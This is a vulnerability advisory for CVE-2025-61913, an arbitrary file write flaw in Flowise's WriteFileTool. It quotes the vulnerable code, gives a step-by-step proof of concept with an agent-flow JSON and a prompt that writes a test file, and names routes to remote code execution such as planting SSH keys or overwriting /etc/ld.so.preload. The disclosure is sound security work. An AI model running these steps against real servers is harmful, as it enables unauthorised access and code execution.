CVE-2025-61913
Flowise is vulnerable to arbitrary file write through its WriteFileTool
Description
### Summary The WriteFileTool in Flowise does not restrict the file path for reading, allowing authenticated attackers to exploit this vulnerability to write arbitrary files to any path in the file system, potentially leading to remote command execution. ### Details Flowise supports providing WriteFileTool for large models, which is used to write files to the server's file system. The implementation of this tool is located at packages/components/nodes/tools/WriteFile/WriteFile.ts. ``` /** * Class for writing data to files on the disk. Extends the StructuredTool * class. */ export class WriteFileTool extends StructuredTool { static lc_name() { return 'WriteFileTool' } schema = z.object({ file_path: z.string().describe('name of file'), text: z.string().describe('text to write to file') }) as any name = 'write_file' description = 'Write file from disk' store: BaseFileStore constructor({ store, ...rest }: WriteFileParams) { super(rest) this.store = store } async _call({ file_path, text }: z.infer<typeof this.schema>) { await this.store.writeFile(file_path, text) return 'File written to successfully.' } } ``` This tool directly uses the file_path parameter passed to it without verifying whether the path belongs to Flowise's working directory. Authenticated attackers can exploit this vulnerability to write files with arbitrary content to any path on the server. There are numerous ways to achieve remote command execution through arbitrary file write vulnerabilities, which will not be elaborated here. For example, attackers could write their own public key to ~/.ssh/authorized_keys to gain remote SSH access, or overwrite /etc/ld.so.preload to hijack dynamic libraries and execute arbitrary code. Flowise's historical vulnerability information (https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-8vvx-qvq9-5948) also describes steps to achieve remote command execution by overwriting the start command in package.json. ### PoC This file writing vulnerability has been verified to exist in the latest Flowise Docker image (https://hub.docker.com/layers/flowiseai/flowise/latest/images/sha256-26300377397818a451e0710389eb77615256b0f3ecc895194850ab35dda3ae7b). The reproduction steps are as follows: 1. Pull the Flowise Docker image ``` docker pull flowiseai/flowise ``` 2. Start the Flowise service ``` docker run -d --name flowise -p 3000:3000 flowise ``` 3. Access the Flowise service at server ip:3000 in your browser and register an account 4. Save the following content as agent.json ``` { "nodes": [ { "id": "startAgentflow_0", "type": "agentFlow", "position": { "x": -203, "y": 37 }, "data": { "id": "startAgentflow_0", "label": "Start", "version": 1.1, "name": "startAgentflow", "type": "Start", "color": "#7EE787", "hideInput": true, "baseClasses": [ "Start" ], "category": "Agent Flows", "description": "Starting point of the agentflow", "inputParams": [ { "label": "Input Type", "name": "startInputType", "type": "options", "options": [ { "label": "Chat Input", "name": "chatInput", "description": "Start the conversation with chat input" }, { "label": "Form Input", "name": "formInput", "description": "Start the workflow with form inputs" } ], "default": "chatInput", "id": "startAgentflow_0-input-startInputType-options", "display": true }, { "label": "Form Title", "name": "formTitle", "type": "string", "placeholder": "Please Fill Out The Form", "show": { "startInputType": "formInput" }, "id": "startAgentflow_0-input-formTitle-string", "display": false }, { "label": "Form Description", "name": "formDescription", "type": "string", "placeholder": "Complete all fields below to continue", "show": { "startInputType": "formInput" }, "id": "startAgentflow_0-input-formDescription-string", "display": false }, { "label": "Form Input Types", "name": "formInputTypes", "description": "Specify the type of form input", "type": "array", "show": { "startInputType": "formInput" }, "array": [ { "label": "Type", "name": "type", "type": "options", "options": [ { "label": "String", "name": "string" }, { "label": "Number", "name": "number" }, { "label": "Boolean", "name": "boolean" }, { "label": "Options", "name": "options" } ], "default": "string" }, { "label": "Label", "name": "label", "type": "string", "placeholder": "Label for the input" }, { "label": "Variable Name", "name": "name", "type": "string", "placeholder": "Variable name for the input (must be camel case)", "description": "Variable name must be camel case. For example: firstName, lastName, etc." }, { "label": "Add Options", "name": "addOptions", "type": "array", "show": { "formInputTypes[$index].type": "options" }, "array": [ { "label": "Option", "name": "option", "type": "string" } ] } ], "id": "startAgentflow_0-input-formInputTypes-array", "display": false }, { "label": "Ephemeral Memory", "name": "startEphemeralMemory", "type": "boolean", "description": "Start fresh for every execution without past chat history", "optional": true, "id": "startAgentflow_0-input-startEphemeralMemory-boolean", "display": true }, { "label": "Flow State", "name": "startState", "description": "Runtime state during the execution of the workflow", "type": "array", "optional": true, "array": [ { "label": "Key", "name": "key", "type": "string", "placeholder": "Foo" }, { "label": "Value", "name": "value", "type": "string", "placeholder": "Bar", "optional": true } ], "id": "startAgentflow_0-input-startState-array", "display": true }, { "label": "Persist State", "name": "startPersistState", "type": "boolean", "description": "Persist the state in the same session", "optional": true, "id": "startAgentflow_0-input-startPersistState-boolean", "display": true } ], "inputAnchors": [], "inputs": { "startInputType": "chatInput", "formTitle": "", "formDescription": "", "formInputTypes": "", "startEphemeralMemory": "", "startState": "", "startPersistState": "" }, "outputAnchors": [ { "id": "startAgentflow_0-output-startAgentflow", "label": "Start", "name": "startAgentflow" } ], "outputs": {}, "selected": false }, "width": 103, "height": 66, "selected": false, "positionAbsolute": { "x": -203, "y": 37 }, "dragging": false }, { "id": "directReplyAgentflow_0", "position": { "x": 209, "y": 30.25 }, "data": { "id": "directReplyAgentflow_0", "label": "Direct Reply 0", "version": 1, "name": "directReplyAgentflow", "type": "DirectReply", "color": "#4DDBBB", "hideOutput": true, "baseClasses": [ "DirectReply" ], "category": "Agent Flows", "description": "Directly reply to the user with a message", "inputParams": [ { "label": "Message", "name": "directReplyMessage", "type": "string", "rows": 4, "acceptVariable": true, "id": "directReplyAgentflow_0-input-directReplyMessage-string", "display": true } ], "inputAnchors": [], "inputs": { "directReplyMessage": "", "undefined": "" }, "outputAnchors": [], "outputs": {}, "selected": false }, "type": "agentFlow", "width": 163, "height": 66, "selected": false, "positionAbsolute": { "x": 209, "y": 30.25 }, "dragging": false }, { "id": "agentAgentflow_0", "position": { "x": -63.5, "y": 89.125 }, "data": { "id": "agentAgentflow_0", "label": "Agent 0", "version": 2, "name": "agentAgentflow", "type": "Agent", "color": "#4DD0E1", "baseClasses": [ "Agent" ], "category": "Agent Flows", "description": "Dynamically choose and utilize tools during runtime, enabling multi-step reasoning", "inputParams": [ { "label": "Model", "name": "agentModel", "type": "asyncOptions", "loadMethod": "listModels", "loadConfig": true, "id": "agentAgentflow_0-input-agentModel-asyncOptions", "display": true }, { "label": "Messages", "name": "agentMessages", "type": "array", "optional": true, "acceptVariable": true, "array": [ { "label": "Role", "name": "role", "type": "options", "options": [ { "label": "System", "name": "system" }, { "label": "Assistant", "name": "assistant" }, { "label": "Developer", "name": "developer" }, { "label": "User", "name": "user" } ] }, { "label": "Content", "name": "content", "type": "string", "acceptVariable": true, "generateInstruction": true, "rows": 4 } ], "id": "agentAgentflow_0-input-agentMessages-array", "display": true }, { "label": "OpenAI Built-in Tools", "name": "agentToolsBuiltInOpenAI", "type": "multiOptions", "optional": true, "options": [ { "label": "Web Search", "name": "web_search_preview", "description": "Search the web for the latest information" }, { "label": "Code Interpreter", "name": "code_interpreter", "description": "Write and run Python code in a sandboxed environment" }, { "label": "Image Generation", "name": "image_generation", "description": "Generate images based on a text prompt" } ], "show": { "agentModel": "chatOpenAI" }, "id": "agentAgentflow_0-input-agentToolsBuiltInOpenAI-multiOptions", "display": false }, { "label": "Tools", "name": "agentTools", "type": "array", "optional": true, "array": [ { "label": "Tool", "name": "agentSelectedTool", "type": "asyncOptions", "loadMethod": "listTools", "loadConfig": true }, { "label": "Require Human Input", "name": "agentSelectedToolRequiresHumanInput", "type": "boolean", "optional": true } ], "id": "agentAgentflow_0-input-agentTools-array", "display": true }, { "label": "Knowledge (Document Stores)", "name": "agentKnowledgeDocumentStores", "type": "array", "description": "Give your agent context about different document sources. Document stores must be upserted in advance.", "array": [ { "label": "Document Store", "name": "documentStore", "type": "asyncOptions", "loadMethod": "listStores" }, { "label": "Describe Knowledge", "name": "docStoreDescription", "type": "string", "generateDocStoreDescription": true, "placeholder": "Describe what the knowledge base is about, this is useful for the AI to know when and how to search for correct information", "rows": 4 }, { "label": "Return Source Documents", "name": "returnSourceDocuments", "type": "boolean", "optional": true } ], "optional": true, "id": "agentAgentflow_0-input-agentKnowledgeDocumentStores-array", "display": true }, { "label": "Knowledge (Vector Embeddings)", "name": "agentKnowledgeVSEmbeddings", "type": "array", "description": "Give your agent context about different document sources from existing vector stores and embeddings", "array": [ { "label": "Vector Store", "name": "vectorStore", "type": "asyncOptions", "loadMethod": "listVectorStores", "loadConfig": true }, { "label": "Embedding Model", "name": "embeddingModel", "type": "asyncOptions", "loadMethod": "listEmbeddings", "loadConfig": true }, { "label": "Knowledge Name", "name": "knowledgeName", "type": "string", "placeholder": "A short name for the knowledge base, this is useful for the AI to know when and how to search for correct information" }, { "label": "Describe Knowledge", "name": "knowledgeDescription", "type": "string", "placeholder": "Describe what the knowledge base is about, this is useful for the AI to know when and how to search for correct information", "rows": 4 }, { "label": "Return Source Documents", "name": "returnSourceDocuments", "type": "boolean", "optional": true } ], "optional": true, "id": "agentAgentflow_0-input-agentKnowledgeVSEmbeddings-array", "display": true }, { "label": "Enable Memory", "name": "agentEnableMemory", "type": "boolean", "description": "Enable memory for the conversation thread", "default": true, "optional": true, "id": "agentAgentflow_0-input-agentEnableMemory-boolean", "display": true }, { "label": "Memory Type", "name": "agentMemoryType", "type": "options", "options": [ { "label": "All Messages", "name": "allMessages", "description": "Retrieve all messages from the conversation" }, { "label": "Window Size", "name": "windowSize", "description": "Uses a fixed window size to surface the last N messages" }, { "label": "Conversation Summary", "name": "conversationSummary", "description": "Summarizes the whole conversation" }, { "label": "Conversation Summary Buffer", "name": "conversationSummaryBuffer", "description": "Summarize conversations once token limit is reached. Default to 2000" } ], "optional": true, "default": "allMessages", "show": { "agentEnableMemory": true }, "id": "agentAgentflow_0-input-agentMemoryType-options", "display": false }, { "label": "Window Size", "name": "agentMemoryWindowSize", "type": "number", "default": "20", "description": "Uses a fixed window size to surface the last N messages", "show": { "agentMemoryType": "windowSize" }, "id": "agentAgentflow_0-input-agentMemoryWindowSize-number", "display": false }, { "label": "Max Token Limit", "name": "agentMemoryMaxTokenLimit", "type": "number", "default": "2000", "description": "Summarize conversations once token limit is reached. Default to 2000", "show": { "agentMemoryType": "conversationSummaryBuffer" }, "id": "agentAgentflow_0-input-agentMemoryMaxTokenLimit-number", "display": false }, { "label": "Input Message", "name": "agentUserMessage", "type": "string", "description": "Add an input message as user message at the end of the conversation", "rows": 4, "optional": true, "acceptVariable": true, "show": { "agentEnableMemory": true }, "id": "agentAgentflow_0-input-agentUserMessage-string", "display": false }, { "label": "Return Response As", "name": "agentReturnResponseAs", "type": "options", "options": [ { "label": "User Message", "name": "userMessage" }, { "label": "Assistant Message", "name": "assistantMessage" } ], "default": "userMessage", "id": "agentAgentflow_0-input-agentReturnResponseAs-options", "display": true }, { "label": "Update Flow State", "name": "agentUpdateState", "description": "Update runtime state during the execution of the workflow", "type": "array", "optional": true, "acceptVariable": true, "array": [ { "label": "Key", "name": "key", "type": "asyncOptions", "loadMethod": "listRuntimeStateKeys", "freeSolo": true }, { "label": "Value", "name": "value", "type": "string", "acceptVariable": true, "acceptNodeOutputAsVariable": true } ], "id": "agentAgentflow_0-input-agentUpdateState-array", "display": true } ], "inputAnchors": [], "inputs": { "agentModel": "chatOpenRouter", "agentMessages": [ { "role": "", "content": "<p><span class=\"variable\" data-type=\"mention\" data-id=\"question\" data-label=\"question\">{{ question }}</span> </p>" } ], "agentTools": [ { "agentSelectedTool": "readFile", "agentSelectedToolRequiresHumanInput": "", "agentSelectedToolConfig": { "basePath": "/", "agentSelectedTool": "readFile" } }, { "agentSelectedTool": "writeFile", "agentSelectedToolRequiresHumanInput": "", "agentSelectedToolConfig": { "basePath": "/", "agentSelectedTool": "writeFile" } } ], "agentKnowledgeDocumentStores": "", "agentKnowledgeVSEmbeddings": "", "agentEnableMemory": false, "agentReturnResponseAs": "userMessage", "agentUpdateState": "", "undefined": "", "agentModelConfig": { "cache": "", "modelName": "qwen/qwen3-30b-a3b", "temperature": 0.9, "streaming": true, "maxTokens": "", "topP": "", "frequencyPenalty": "", "presencePenalty": "", "timeout": "", "basepath": "https://openrouter.ai/api/v1", "baseOptions": "", "agentModel": "chatOpenRouter" } }, "outputAnchors": [ { "id": "agentAgentflow_0-output-agentAgentflow", "label": "Agent", "name": "agentAgentflow" } ], "outputs": {}, "selected": false }, "type": "agentFlow", "width": 232, "height": 100, "selected": false, "positionAbsolute": { "x": -63.5, "y": 89.125 }, "dragging": false } ], "edges": [ { "source": "startAgentflow_0", "sourceHandle": "startAgentflow_0-output-startAgentflow", "target": "agentAgentflow_0", "targetHandle": "agentAgentflow_0", "data": { "sourceColor": "#7EE787", "targetColor": "#4DD0E1", "isHumanInput": false }, "type": "agentFlow", "id": "startAgentflow_0-startAgentflow_0-output-startAgentflow-agentAgentflow_0-agentAgentflow_0" }, { "source": "agentAgentflow_0", "sourceHandle": "agentAgentflow_0-output-agentAgentflow", "target": "directReplyAgentflow_0", "targetHandle": "directReplyAgentflow_0", "data": { "sourceColor": "#4DD0E1", "targetColor": "#4DDBBB", "isHumanInput": false }, "type": "agentFlow", "id": "agentAgentflow_0-agentAgentflow_0-output-agentAgentflow-directReplyAgentflow_0-directReplyAgentflow_0" } ] } ``` 5. Click on "AgentFlows" on the left, then click "Add New" on the right to enter the Agent creation page. Click the gear button in the upper right corner, select "Load Agents," choose the agent.json file, and after successful import, you will see three connected nodes. 6. Double-click the middle "Agent 0" node, click "ChatOpenRouter Parameters," then "Connect Credential," and select "Create New." Enter a valid OpenRouter API Key. Alternatively, click "Model" to choose another LLM provider. Once done, click the save button in the upper right corner. 7. After saving, click the purple chat button in the upper right corner and enter: Write "hacked" to /tmp/hacked.txt. 8. After the call is completed, log in to the container via `docker exec -it [container id] sh`, and you can see that the file has been successfully written. ### Impact Authenticated attackers can exploit this vulnerability to write arbitrary files to any path on the server, ultimately achieving remote command execution. ### Credit This vulnerability was discovered by: - XlabAI Team of Tencent Xuanwu Lab - Atuin Automated Vulnerability Discovery Engine CVE(s) and credit(s) are preferred. If you have any questions regarding the vulnerability details, please feel free to reach out to us for further discussion. Our email address is [email protected].